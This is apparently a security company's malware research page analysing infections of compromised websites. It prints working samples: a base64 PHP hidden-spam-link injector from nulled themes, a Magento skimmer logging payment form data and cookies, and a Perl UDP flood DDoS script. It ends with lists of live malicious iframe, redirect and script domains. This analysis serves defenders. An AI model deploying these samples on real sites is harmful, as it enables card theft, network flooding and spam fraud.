Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Sucuri Research Labs

The home of our Security Operations Group, including our Malware Research and Incident Response teams.

We at Sucuri, always stress the risks associated with using themes, plugins or any add-on downloaded from unofficial sources (Nulled Versions). During our investigation process, we found into a theme, a malicious code being used to promote an external website and possibly generate revenue to the “developer” without user’s consent. Inside the downloaded package there were lots of files named index.php and default.php throughout different folders. Those files contained the following base64 code:

 <?php $wfk='PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjA7bGVmdDotOTk5OXB4OyI+CjxhIGhyZWY9Imh0dHA6Ly9qb29tbGE0ZXZlci5ydS9ib3d0aGVtZXMvMjI4Ny1idC1waG90b2dyYXBoeS5odG1sIiB0aXRsZT0iQlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhIiB0YXJnZXQ9Il9ibGFuayI+QlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhPC9hPgo8YSBocmVmPSJodHRwOi8vYWxsLWJvb2submV0LyIgdGl0bGU9ItCa0L3QuNCz0LgiIHRhcmdldD0iX2JsYW5rIj7QmtC90LjQs9C4PC9hPgo8L2Rpdj4='; echo base64_decode($wfk); ?>

Decoding it into a human-readable format, we got these “invisible” malicious links:

<div style="position:absolute;top:0;left:-9999px;">
<a href="hxxp://joomla4ever .ru/bowthemes/2287-bt-photography.html" title="BT Photography - шаблон joomla" target="_blank">BT Photography - шаблон joomla</a>
<a href="hxxp://all-book .net/" title="Книги" target="_blank">Книги</a>
</div>

This kind of infection is commonly injected into Nulled components for different CMS’s and are designed specifically to damage the SEO positioning of a website due to the arbitrary links as well as promoting a particular website with intent to generate revenue for the “developers”.

To reduce the risks, we always recommend downloading any add-on (themes, plugins, extensions) for your site directly from the official source because you never know which extra “feature” you are getting from those “alternative” versions.

You may find more information related to this infection here, here and here.

SEO spam is very common for a reason -- money. Spammers are paid to promote websites on Google. We deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy html pages. However, few days ago we found an interesting variation: a whole CMS specially configured and used to load spam on a website.

Read More ...

An infected site can be efficient for cyber-criminals unless it gets blacklisted. Traffic significantly drops when a URL is on the Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign directly correlates to absence of the server in anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.

Read More ...

We are often seeing malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eyes as it was a bit different from the others on how the information was collected and stored.

Usually, the attacker send all the sensitive information via e-mail but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}
Read More ...

After a website is compromised, it can be misused in multiple ways. We often see it being used on Spam SEO campaigns or to distribute drive-by-downloads. However, last week, we found an interesting DDoS (Denial of Service) tool on one of our clients websites that I would like to share.

The code was added to /var/tmp and being called by an external PHP script to allow a remote attacker to start DDoS against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes an $ip, $port and $time as an argument to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
 

Once the information is supplied, the script sends as many UDP packets as possible trying to flood the victim’s network. The side effect is that the compromised server could also get overloaded by its resources (cpu/memory) consumption and also overflow bandwidth limits.

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help you protecting your site against this and many other attacks.

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
20iframehttp://businessriver.top/?aff=333009
9iframehttp://nmityiwr.hopto.org/wordpress/?ARX8
9iframehttp://nlbbudm.hopto.org/wordpress/?ARX8
8iframehttp://xdstnhz.ddnsking.com/wordpress/?ARX8
5iframehttp://lajliivg.ddnsking.com/wordpress/?ARX8
5iframehttp://ioqlswt.hopto.org/wordpress/?ARX8
5iframehttp://hvixybvnrd.ddnsking.com/wordpress/?ARX8
4iframehttp://dgrmwa.ddnsking.com/wordpress/?ARX8
3iframehttp://thyecvxqrm.ddnsking.com/wordpress/?ARX8
3iframehttp://pltuyjini.hopto.org/wordpress/?ARX8
3iframehttp://bs.israelinfo.ru/adframe.php?n=goo110113
2iframehttp://art-blesk.com/ru/news/
1iframehttp://emhgdsbb.ddnsking.com/wordpress/?ARX8
Limited view... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
16redirectionshttp://go60.ru
10redirectionshttp://web-redirect.ru/?web
6redirectionshttp://traf-extractor.ru
6redirectionshttp://ph21us.ru/
6redirectionshttp://liuliang.ok365.com/
5redirectionshttp://unjytzaq.ru/count28.php
4redirectionshttp://default7.com
3redirectionshttp://crossdirect.ru
2redirectionshttp://royalmai.com/?folio=9PO6Z3MVF
2redirectionshttp://qertea.instanthq.com/
1redirectionshttp://www.internoc24.com/
1redirectionshttp://www.hdpornsitesi.in/
1redirectionshttp://www.goodsellmall.com
1redirectionshttp://www.gadgetsforall.net/EGoiTC4rWL.php?s=24
1redirectionshttp://www.alloverdating.com/7dJcsNqD6P.php?s=24
1redirectionshttp://ww1.threup.com/?folio=9POGF6H4I
1redirectionshttp://ww1.siatrik.com/?folio=9POGF6H4I
1redirectionshttp://ww1.mp3hog.net/?folio=9POGF6H4I
1redirectionshttp://ww1.mp3cat.org/?folio=9POGF6H4I
1redirectionshttp://ww1.growthgreenes.net/?folio=9POGF6H4I
Limited view... Only the top entries being displayed.

Spammers

Latest spammers we have detected sending comment, forum or SEO spam.

# of sites infectedTypeMalware / Domains
20spammerhttp://123livesex.com/,forumspam,2014-01
20spammerhttp://20min.ch,forumspam,2014-01
20spammerhttp://90210daily.com/,forumspam,2014-01
20spammerhttp://EzAdBlaster.com,forumspam,2014-01
20spammerhttp://absolutefringe.com,forumspam,2014-01
20spammerhttp://adaptfunrun.org/,forumspam,2014-01
20spammerhttp://andresmarcossanchez.com/MichaelKors/ ,forumspam,2014-01
20spammerhttp://appliancelandinc.com/,forumspam,2014-01
20spammerhttp://audiobookkeeper.ru/,forumspam,2014-01
20spammerhttp://australiainternetsearch.com/,forumspam,2014-01
20spammerhttp://autism.sedl.org/index.php/about-us,forumspam,2014-01
20spammerhttp://axanaxplease.com/,forumspam,2014-01
20spammerhttp://ayurvedatradicional.com/wordpress/ ,forumspam,2014-01
20spammerhttp://azezhomeloans.com/body.html,forumspam,2014-01
20spammerhttp://baltimorecomiccon.com/sponsors/,forumspam,2014-01
20spammerhttp://bashkiaprrenjas.com/,forumspam,2014-01
20spammerhttp://bellezzaamica.it/Moncler-Sale-With-Free-Shipping.html,forumspam,2014-01
20spammerhttp://birdsofstkittsnevis.com/files/,forumspam,2014-01
20spammerhttp://bmaphoenix.org/young-professionals/,forumspam,2014-01
20spammerhttp://bradblaze.com.au/,forumspam,2014-01
Limited view... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
11javascripthttp://mobi-avto.ru/cnt2.gif": var a9c6711=[478,538,578,583,596,510,593,594,599,586,579,539,512...
2javascripthttp://rencontres.itemsz.com/main.php": document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61...
158javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
128javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
97javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
78javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
75javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
68javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
59javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
51javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
49javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
45javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
40javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
38javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
35javascript<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
Limited view... Only the top entries being displayed.